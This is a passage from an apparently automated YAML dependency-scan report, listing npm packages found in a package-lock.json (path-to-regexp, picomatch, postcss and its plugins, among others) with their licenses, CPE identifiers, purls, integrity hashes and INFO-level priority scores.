https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz + integrity: sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c2433fd071fcfad6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: peberminta 0.9.0' + title: peberminta 0.9.0 + description: 'Package discovered: peberminta 0.9.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f3acb6a3529e1191 + name: peberminta + version: 0.9.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/peberminta@0.9.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz + integrity: sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bd0577c6ddbc7f17 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: picocolors 1.1.1' + title: picocolors 1.1.1 + description: 'Package discovered: picocolors 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9b208867cdc8b323 + name: picocolors + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/picocolors@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz + integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2e6faecb84cf8a8b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: picomatch 2.3.2' + title: picomatch 2.3.2 + description: 'Package discovered: picomatch 2.3.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0c0ba7fcf7a893f6 + name: picomatch + version: 2.3.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/picomatch@2.3.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz + integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 44e51885407159f3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: picomatch 4.0.4' + title: picomatch 4.0.4 + description: 'Package discovered: picomatch 4.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 09943c54769c1f79 + name: picomatch + version: 4.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/picomatch@4.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz + integrity: sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b7793733f0a92625 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: pify 2.3.0' + title: pify 2.3.0 + description: 'Package discovered: pify 2.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 93c54feee38dbf96 + name: pify + version: 2.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/pify@2.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/pify/-/pify-2.3.0.tgz + integrity: sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0b578240afa70fcd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: pirates 4.0.7' + title: pirates 4.0.7 + description: 'Package discovered: pirates 4.0.7' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 47481e92080dd044 + name: pirates + version: 4.0.7 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/pirates@4.0.7 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz + integrity: sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 72750f8253cdf631 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: png-js 2.0.0' + title: png-js 2.0.0 + description: 'Package discovered: png-js 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7a0a81fa01919ffb + name: png-js + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/png-js@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz + integrity: sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA== + dependencies: + fflate: ^0.8.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 017b0d73e37dad2f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: pngjs 5.0.0' + title: pngjs 5.0.0 + description: 'Package discovered: pngjs 5.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 33a77729322028df + name: pngjs + version: 5.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/pngjs@5.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz + integrity: sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6c2c21065eca2894 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss 8.4.31' + title: postcss 8.4.31 + description: 'Package discovered: postcss 8.4.31' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a519bffcd9b56c6d + name: postcss + version: 8.4.31 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/postcss@8.4.31 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz + integrity: sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ== + dependencies: + nanoid: ^3.3.6 + picocolors: ^1.0.0 + source-map-js: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 87700f6dfcbe47e2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss 8.5.12' + title: postcss 8.5.12 + description: 'Package discovered: postcss 8.5.12' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 588683a1923c27d7 + name: postcss + version: 8.5.12 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/postcss@8.5.12 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz + integrity: sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA== + dependencies: + nanoid: ^3.3.11 + picocolors: ^1.1.1 + source-map-js: ^1.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f6953879c586ae44 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-import 15.1.0' + title: postcss-import 15.1.0 + description: 'Package discovered: postcss-import 15.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9f2c64d652651310 + name: postcss-import + version: 15.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-import@15.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz + integrity: sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew== + dependencies: + postcss-value-parser: ^4.0.0 + read-cache: ^1.0.0 + resolve: ^1.1.7 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 49a05cdffa8a7ef9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-js 4.1.0' + title: postcss-js 4.1.0 + description: 'Package discovered: postcss-js 4.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9feba814d6f9cb30 + name: postcss-js + version: 4.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-js:postcss-js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-js:postcss_js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_js:postcss-js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_js:postcss_js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_js:4.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-js@4.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-js/-/postcss-js-4.1.0.tgz + integrity: sha512-oIAOTqgIo7q2EOwbhb8UalYePMvYoIeRY2YKntdpFQXNosSu3vLrniGgmH9OKs/qAkfoj5oB3le/7mINW1LCfw== + dependencies: + camelcase-css: ^2.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 92ac10dec31ee632 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-load-config 6.0.1' + title: postcss-load-config 6.0.1 + description: 'Package discovered: postcss-load-config 6.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 07fb83a013bf4ef4 + name: postcss-load-config + version: 6.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-load-config:postcss-load-config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-load-config@6.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz + integrity: sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g== + dependencies: + lilconfig: ^3.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a302d705f049e265 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-nested 6.2.0' + title: postcss-nested 6.2.0 + description: 'Package discovered: postcss-nested 6.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 16f11e75cb882477 + name: postcss-nested + version: 6.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-nested@6.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz + integrity: sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ== + dependencies: + postcss-selector-parser: ^6.1.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 002cf57b0b0dcab6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-selector-parser 6.1.2' + title: postcss-selector-parser 6.1.2 + description: 'Package discovered: postcss-selector-parser 6.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f7f4c134629f3b3a + name: postcss-selector-parser + version: 6.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/postcss-selector-parser@6.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz + integrity: sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg== + dependencies: + cssesc: ^3.0.0 + util-deprecate: ^1.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 738a4e319226bde2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: postcss-value-parser 4.2.0' + title: postcss-value-parser 4.2.0 + description: 'Package discovered: postcss-value-parser 4.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d70570520f43a33c + name: postcss-value-parser + version: 4.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: 